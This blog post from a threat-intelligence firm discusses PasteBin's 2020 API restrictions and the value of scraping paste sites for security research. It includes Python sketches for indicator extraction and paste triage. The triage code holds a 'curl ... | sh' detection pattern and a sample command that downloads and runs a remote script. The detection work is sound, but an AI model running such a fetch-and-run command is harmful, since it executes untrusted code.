PasteBin Kills Search And That’s Okay. No, Really.
UPDATE 17th April 2020: PasteBin have announced they are looking into ways to give security researchers access. But they have not mentioned if this will require payment. https://twitter.com/pastebin/status/1250847990131986432
It’s no secret that the InfoSec community relies on a variety of intelligence sources to monitor potential threats and identify threat actors. One of these sources is PasteBin, a quick and easy platform for sharing blobs of text and a favourite among both techies and criminals.
Even a quick Google Cache search with the term “site:pastebin.com password” yields some interesting results, which can be converted into signals, such as IOCs or passive intelligence.
In fact, we make heavy use of PasteBin scraping to snoop in places Black Hatters dwell, which has helped us detect and report several serious security breaches.
But this week PasteBin changed their business model, potentially undermining this practice unless you pay for enterprise access.
According to their very recent Twitter release,
“Access to the Enterprise API is granted to Pastebin verified institutions and organizations only. If you wish to use the Enterprise API or want to know more, please contact our sales team… to apply.” — April 15, 2020
So will this shift in policy have far-reaching consequences? To answer that, let’s first look at why web scraping is important and what PasteBin (and other text storage platforms like ControlC, HasteBin, Just Paste Me, Private Bin et al.) actually do.
Why Web Scraping is Important for Security
Web scraping is integral to cyber security and threat intelligence teams because it allows the extraction of data from publicly available sources — data that can then be processed in order to garner valuable insights such as information linked to security breaches, doxxing or personal information leaks, hacked financial data, stolen source code, and other cyber criminal activity.
Scraping also makes it possible to keep track of a company’s brand and reputation, making it an effective way to keep up with developing threats, major leaks of personal information, and similar events.
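To make the idea of turning scraped text into signals a little more concrete, here is a minimal sketch in Python. It is not how any particular product works: the regular expressions are deliberately simple, and the names `extract_indicators` and `watchlist_hits`, the sample text, and the brand names are all hypothetical, chosen only for illustration.

```python
import re

# Illustrative patterns only; production extraction needs stricter validation.
EMAIL_RE = re.compile(r"\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}\b")
IPV4_RE = re.compile(
    r"\b(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)\b"
)
SHA256_RE = re.compile(r"\b[a-fA-F0-9]{64}\b")
MD5_RE = re.compile(r"\b[a-fA-F0-9]{32}\b")


def extract_indicators(text):
    """Return de-duplicated, sorted indicator candidates found in text."""
    return {
        "emails": sorted(set(EMAIL_RE.findall(text))),
        "ipv4": sorted(set(IPV4_RE.findall(text))),
        "sha256": sorted(set(SHA256_RE.findall(text))),
        "md5": sorted(set(MD5_RE.findall(text))),
    }


def watchlist_hits(text, watchlist):
    """Return the watchlist terms (e.g. brand names) present in text, ignoring case."""
    lowered = text.lower()
    return [term for term in watchlist if term.lower() in lowered]


# Made-up sample paste (reserved example domain and documentation IP range).
sample = (
    "dump from example-corp.test\n"
    "alice@example.com:hunter2\n"
    "c2 at 203.0.113.7\n"
    "d41d8cd98f00b204e9800998ecf8427e\n"
)
indicators = extract_indicators(sample)
hits = watchlist_hits(sample, ["Example-Corp", "OtherBrand"])
```

Anything these patterns match is only a candidate. A real pipeline would still need to validate, enrich, and de-duplicate results before treating them as IOCs.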
What is PasteBin?
PasteBin is a website where users can store text online for a set period of time and share it with literally anyone on the planet, as long as they have the direct link to a paste. That link is often randomly generated and thus hard to guess. The site was born from excessive user activity on Internet Relay Chat (IRC), an instant messaging protocol launched in 1988. Think of it as a corkboard on the wall where notes are stuck for all to see.
Sharing code directly in IRC channels (and other messaging applications) disrupts the flow of messages and can alter the code itself. Users needed a third-party site where they could share plain text blocks as a link, allowing other users to easily access and edit them.
Given the sheer number of different paste sites that started to appear all over the place, including in the “deep web” that is not indexed by search engines, finding relevant pastes became a tedious and potentially dangerous task.
So PasteBin was designed to allow its users to “paste” large blocks of code with syntax highlighting and proper formatting, which can be shared by posting a link in a chat. Since the URL only took up a single line, it soon became a popular solution. An early use was also to circumvent the 140-character restriction on Twitter, by linking to the “pastes” in coders’ Twitter posts.
People also commonly use PasteBin to share code when their IM app doesn’t support proper formatting, and to share large amounts of debugging output when asking for help online. Other common uses include uploading source code for sharing, review, or collaboration; sharing lists of dark web links; re-publishing text that has been removed from other sites; and publicizing breached data and other sensitive information (such as passwords), since the site does not require a login and so reduces the poster’s digital footprint.
The Good, the Bad…
Inevitably, paste sites are also popular platforms for illegal activities. Bad actors often use free and universally accessible platforms as C2 (command and control) hubs for botnets, to spread malware, or as quick and easy places to dump sensitive information, since most of these platforms do not require any kind of login credentials. This fits well with reducing their digital footprint, which is what the majority of hackers are after in order to avoid detection.
Other common examples of illegal or shady content on PasteBin (and other paste websites) include packed malware payloads, malicious shell scripts, commands for infected hosts to execute (essentially a way to use PasteBin as a C2 server), and leaked credentials and other sensitive information.
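As a rough illustration of how a scraper might triage pastes for the kinds of content listed above, the following Python sketch applies three simple heuristics. Everything here is an assumption made for the example: the function names, the labels, the thresholds (three combo lines, 200 base64 characters), and the patterns themselves. Real detection is considerably more involved.

```python
import base64
import binascii
import re

# Hypothetical heuristics, for illustration only.
COMBO_RE = re.compile(r"^[^\s:@]+@[^\s:@]+\.[^\s:@]+:\S+$")  # email:password line
DOWNLOADER_RE = re.compile(r"\b(?:curl|wget)\b[^\n|]*\|\s*(?:ba)?sh\b")  # curl ... | sh
BASE64_RE = re.compile(r"^[A-Za-z0-9+/]{200,}={0,2}$")  # one long base64-looking line


def looks_like_base64_blob(line):
    """True if the line is long, base64-shaped, and decodes without error."""
    if len(line) % 4 != 0 or not BASE64_RE.match(line):
        return False
    try:
        base64.b64decode(line, validate=True)
    except (binascii.Error, ValueError):
        return False
    return True


def triage(text, combo_threshold=3):
    """Return a sorted list of coarse labels describing what the paste resembles."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    labels = set()
    if sum(1 for ln in lines if COMBO_RE.match(ln)) >= combo_threshold:
        labels.add("credential_dump")
    if DOWNLOADER_RE.search(text):
        labels.add("shell_downloader")
    if any(looks_like_base64_blob(ln) for ln in lines):
        labels.add("encoded_payload")
    return sorted(labels)


# Made-up inputs using reserved documentation addresses.
creds = "a@x.com:pw1\nb@y.org:pw2\nc@z.net:pw3\n"
script = "#!/bin/sh\ncurl http://198.51.100.2/x.sh | sh\n"
blob = base64.b64encode(bytes(range(256))).decode()

creds_labels = triage(creds)
script_labels = triage(script)
blob_labels = triage(blob)
benign_labels = triage("hello world")
```

Heuristics like these produce false positives (plenty of legitimate pastes contain base64 or install one-liners), so they are best treated as a first-pass filter that decides what a human or a deeper analysis stage looks at next.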
In an attempt to prevent malicious usage, PasteBin does prohibit:
- the posting of email addresses and password lists
- login details
- stolen source code
- hacked data
- copyrighted information and material
- banking, credit card, or financial information
- personal information
- pornographic information
- and spam links, including site promotion.
However, these “rules” and “restrictions” are never enforced, because enforcement is nearly impossible to automate and would require too much manual labour (read: money) to moderate by hand. Therefore, anybody can post whatever they want from behind a VPN, proxy, or Tor. Worse yet, even without these methods, chances are the content will stay up, and it is sometimes even indexed by search engines like Google and Bing. It’s fair to point out that to find all of the pastes, users must use the site’s internal keyword search tool to look for specific content, or get paste links directly from other users.
PasteBin is user-friendly, supports large text files, doesn’t require user registration, and allows for anonymous posting (if the user is utilizing a VPN, proxy chain, or Tor). Because it relies solely on users to report abuse, a Wild West mentality of “pretty much anything goes” reigns supreme.
Perhaps the most famous case of illicit PasteBin activity involves Sony Pictures. In November 2014, Sony Pictures’ computer systems were hacked by a group known as Guardians of Peace (GOP). A big chunk of the data exfiltrated during the breach was uploaded to PasteBin, including employee information for over a million individuals, upcoming production details, and music codes.
A more recent example involves Amazon Ring. In December 2019, its customers were compromised when breached data for over 3,000 sold cameras, including customer emails and passwords, enabled hackers to access customer addresses, camera footage, and financial data.
…And the Ugly
Many security researchers contribute to the community as volunteers, often to improve their own knowledge and help make the Internet a safer place.
Like most free online services, PasteBin has seemingly changed their monetization strategy. After all, these companies are not charities. However, this is at odds with the InfoSec community, many of whom don’t have the budget for buying access to “yet another API”.
Of course, there are other paid “cyber intelligence services” which will continue to scrape sites such as PasteBin, and offer these as direct feeds to their customer base.
How did this impact our platform?
Fortunately our data ingestion engines use both APIs and traditional scraping techniques, as official APIs do not always present all the available data.
Thanks to a recent ruling in the legal dispute between LinkedIn and data analytics firm hiQ Labs, it has been established, at least in the US, that scraping publicly accessible website data is not in itself illegal.
And in fact, it’s often the undocumented APIs, such as those which drive frontend applications, which yield the cleanest data. This is often because frontend APIs are designed to reduce round-trips, so data queries are bundled together on the backend and sent in a large prefetch chunk.
For any serious intelligence operation, collecting this data is the only option because the existing APIs on PasteBin did not offer sufficient features required for advanced usage.
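Combining API results with scraped records, as described above, could look something like the following Python sketch. It assumes a hypothetical `PasteRecord` shape and a simple rule: the API record is preferred, and any field it leaves empty is filled from the scraped copy. None of these names or fields come from PasteBin or from our platform; they exist only to illustrate the merge.

```python
from dataclasses import dataclass
from typing import Iterable, List, Optional


@dataclass(frozen=True)
class PasteRecord:
    """Hypothetical record shape; real sources expose different fields."""
    key: str
    title: Optional[str] = None
    author: Optional[str] = None
    body: Optional[str] = None


def fill_missing(primary: PasteRecord, secondary: PasteRecord) -> PasteRecord:
    """Keep primary's values; use secondary's where primary is empty or None."""
    return PasteRecord(
        key=primary.key,
        title=primary.title or secondary.title,
        author=primary.author or secondary.author,
        body=primary.body or secondary.body,
    )


def merge_sources(
    api_records: Iterable[PasteRecord],
    scraped_records: Iterable[PasteRecord],
) -> List[PasteRecord]:
    """Merge two feeds by paste key, returning records sorted by key."""
    merged = {rec.key: rec for rec in api_records}
    for rec in scraped_records:
        if rec.key in merged:
            merged[rec.key] = fill_missing(merged[rec.key], rec)
        else:
            merged[rec.key] = rec
    return [merged[key] for key in sorted(merged)]


# Made-up records: the API knows the title, the scraper knows the rest.
api_feed = [PasteRecord(key="abc", title="config dump")]
scraped_feed = [
    PasteRecord(key="abc", author="anon", body="db_password=..."),
    PasteRecord(key="def", body="another paste"),
]
combined = merge_sources(api_feed, scraped_feed)
```

Preferring one source and back-filling from the other is just one possible policy. Depending on which source is fresher or more trustworthy, the priority could be reversed or decided per field.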
PasteBin has no doubt recognised the value in offering in-house search functionality which does not rely on Google Search.
The removal of search functionality, which relied on Google Search and was not very good at archival, will likely not have much impact on the community as a whole. Deleted posts would eventually expire and searching for metadata, such as name or date range, was a difficult task.
But they are several years late to the game. There are several dozen companies who have collected over a decade’s worth of data from many such sites, and they offer search capabilities over all of them in one platform.
I’m part of the founding team at ZeroGuard, one of the many cyber intelligence companies operating in this space — gosh that sounds rather corporate, doesn’t it?!?
But we’re quite special, because we solve all the hard data science problems for you — rather than presenting “yet another full text search platform” — although we offer that too!
We have an extremely talented team of software engineers and data analysts who are constantly looking for new ways to enrich datasets and extract valuable intelligence.
Our APIs offer broader data access than most other commercial offerings. They can also be used independently as a raw data source to support organizations with their existing threat intelligence tools.
If you’re interested in learning more about how we solved some of these technical challenges, keep an eye out for our next podcast, where we will be sharing our journey to 6 trillion rows of data.